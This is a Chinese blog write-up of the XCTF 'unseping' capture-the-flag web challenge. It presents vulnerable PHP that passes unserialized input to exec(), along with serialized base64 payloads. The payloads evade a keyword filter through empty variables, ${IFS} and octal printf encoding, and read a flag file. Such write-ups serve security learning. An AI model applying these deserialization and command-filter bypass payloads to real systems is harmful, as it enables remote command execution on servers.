XCTF1-web unseping

最新推荐文章于 2024-03-08 15:50:02 发布
最新推荐文章于 2024-03-08 15:50:02 发布
阅读量816 收藏 1
点赞数
分类专栏: CTF练习记录 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/orchid_sea/article/details/128063751
版权

unseping

题目描述

在这里插入图片描述

进入场景

源代码分析,反序列化场景

 <?php
highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}

$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>
1. 分析代码

POST传入参数ctf,且使用base64解码后反序列化传入。unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。
ease类中,定义了两个私有变量和五个方法:
construct()为构造函数,定义类的初始化。
destruct()为析构函数,对象销毁前使用。
ping():exec()执行命令函数,var_dump()输出结果。
waf():preg_match_all()函数用于执行一个全局正则表达式匹配,可以搜索字符串中所有可以和正则表达式匹配的结果。源码中对“|、&、;、空格、/、cat、flag、tac、php、ls”进行匹配,若匹配到的结果为false就返回str。
wakeup()函数:使用foreach遍历字符串检测waf。执行unserialize()时,先会调用这个函数。

2. 编写PHP对应的序列化代码

(1)编写序列化测试代码

<?php
class ease{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
}    
    $a = new ease("ping",array('pwd'));
    $b = serialize($a);
    echo $b;
    echo "<br>";
    echo "<br>";
    echo base64_encode($b);
?>

(2)对参数进行序列化和编码
在这里插入图片描述(3)传入ctf
在这里插入图片描述测试pwd成功请求,然后绕过正则获取flag路径。

3. 绕过正则

(1)ls绕过的方法有:空的环境变量 、单引号 、双引号
使用空的环境变量绕过
在这里插入图片描述

O:4:"ease":2:{s:12:"easemethod";s:4:"ping";s:10:"easeargs";a:1:{i:0;s:6:"l${X}s";}}

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo2OiJsJHtYfXMiO319

在这里插入图片描述提示flag在“flag_1s_here”文件夹里面
(2)空格使用${IFS}来代替
在这里插入图片描述

O:4:"ease":2:{s:12:"easemethod";s:4:"ping";s:10:"easeargs";a:1:{i:0;s:28:"l${X}s${IFS}fl${X}ag_1s_here";}}

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoyODoibCR7WH1zJHtJRlN9Zmwke1h9YWdfMXNfaGVyZSI7fX0=

在这里插入图片描述发现存在一个flag的文件flag_831b69012c67b35f.php

4. 进行转码
cat flag_1s_here/flag_831b69012c67b35f.php
cd flag_1s_here;cat flag_831b69012c67b35f.php
cd flag_1s_here&&cat flag_831b69012c67b35f.php

由于没找到绕过 ; 、& 和 \ 的方法,再搜索看看

(1)有提到“\154\163”可以代替ls

O:4:"ease":2:{s:12:"easemethod";s:4:"ping";s:10:"easeargs";a:1:{i:0;s:25:"$(printf${IFS}"\154\163")";}}

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoyNToiJChwcmludGYke0lGU30iXDE1NFwxNjMiKSI7fX0=

是ls的ascii码转换成八进制
在这里插入图片描述(2)按照这个思路,将“cat flag_1s_here/flag_831b69012c67b35f.php”进行转码
写了一个Python脚本对参数进行转码

x = "cat flag_1s_here/flag_831b69012c67b35f.php"
# print(str)
r = ""
for i in x:
    r = r +'\\'+format(ord(i),'o')
    
print(r)

(3)传入转码后的参数

O:4:"ease":2:{s:12:"easemethod";s:4:"ping";s:10:"easeargs";a:1:{i:0;s:169:"$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")";}}

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNjk6IiQocHJpbnRmJHtJRlN9IlwxNDNcMTQxXDE2NFw0MFwxNDZcMTU0XDE0MVwxNDdcMTM3XDYxXDE2M1wxMzdcMTUwXDE0NVwxNjJcMTQ1XDU3XDE0NlwxNTRcMTQxXDE0N1wxMzdcNzBcNjNcNjFcMTQyXDY2XDcxXDYwXDYxXDYyXDE0M1w2Nlw2N1wxNDJcNjNcNjVcMTQ2XDU2XDE2MFwxNTBcMTYwIikiO319

在这里插入图片描述获取到flag

参考链接:https://blog.csdn.net/shelter1234567/article/details/127337541

777sea
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界web新手练习unseping
JIN_7X的博客
09-26 4525
这是新手区第一题?不敢想象后边的题是什么样
攻防世界题目练习——Web难度1(二)_&lt; php highlight_file(__file__); include(&quot;(1)
最新发布
2301_79054215的博客
04-20 761
是Linux中的一个特殊变量,它代表了当前的字段分隔符,它的默认值是空格、制表符和换行符,当输入命令时,会以空格、制表符或换行符作为分隔符,将输入的内容分割成不同的字段,每个字段将作为命令的一个参数进行解析和执行。现在我们知道了waf函数过滤的有哪些字符或字符串,我们要避免直接输入这些关键词,但是有些字符在我们查找flag的过程中不可避免地会用到,因此我们对它们进行绕过,绕过的方式有如下几种。函数进行了匹配,第一个参数是给定的用来模式匹配的正则表达式,第二个参数是输入的要匹配的字符串。
xctfunseping
qq_40646572的博客
10-12 5044
这是一道,让我头皮发麻的题,前期感觉一般,后面感觉好像搞不定了。。。看了writeup才知道php还能这样用。。题目如上,一眼就可以看出这就是考察php的反序列化,感觉这不so easey?好像还真不是(菜鸡挠头)。首先就是正常的反序列化,在反序列化的时候首先触发__wakeup()函数,迭代args参数中的值进行过滤,解题的关键就是绕过这个过滤。可以看到,
xctf unseping
qq_51796436的博客
12-16 178
php的payload如下:注意$printf后面接Tab,空格要被waf禁掉。
攻防世界web新手练习 -unseping
yuanxu8877的博客
10-19 6812
新版攻防世界XCTF-web新手练习
攻防世界Web题 - unseping 总结
weixin_62871152的博客
11-02 2164
攻防世界-WEB
XCTF-HW-pipeline附件
11-09
附件
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
ctf-web-unseping解题思路
m0_73734159的博客
05-13 885
这道题解题的关键就在于PHP序列化。
攻防世界-unseping
32bin的博客
10-28 1541
收藏 反馈 难度:1 方向:Web 题解数:1 解出人数:255 题目来源: 江苏工匠杯 题目描述: unseping 题目场景: http://61.147.171.105:62407 100% 倒计时: 3时17分40秒
攻防世界新手练习区——unseping
weixin_65049289的博客
12-21 3428
攻防世界新手练习区——unseping
【攻防世界】江苏工匠杯 Web unseping
DG_s1mple
12-30 906
打开题目,发现又来到了我的知识盲区,php的反序列化首先我们来简单的讲一下,什么是反序列化反序列化,主要是两个函数通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击。
php rce和绕过
m0_73973498的博客
10-08 2182
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
Web安全攻防世界04 unseping(江苏工匠杯)
weixin_42789937的博客
12-01 1707
Web安全攻防世界04 unseping(江苏工匠杯)参考大佬们的WP有所补充,时隔多月再次整理博文,修复了原来不明白的点,内容小白友好~
攻防世界 WEB刷题
weixin_73055648的博客
07-11 447
攻防世界web刷题
江苏工匠杯-web
m0_74855736的博客
03-08 1524
江苏省工匠杯CTF比赛
preg_match_all 总结
u013086432的博客
04-29 393
例子:         $str="/post///";                 //NULL         preg_match_all("/]+)?>/",$str,$matches);                 echo "NULL";         var_dump($matches);                 //PREG_PATTERN
web-ics-05
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X-forwarded-For=127.0.0.1。\[2\] - preg_replace函数可以执行正则表达式的搜索和替换。\[3\] 根据这些信息,我们可以推测"web-ics-05"可能是一道关于入侵和利用管理平台的题目,要求读取文件并进行一些操作,同时还需要使用preg_replace函数进行正则表达式的搜索和替换。具体的题目要求和操作细节可能需要进一步的信息才能确定。 #### 引用[.reference_title] - *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值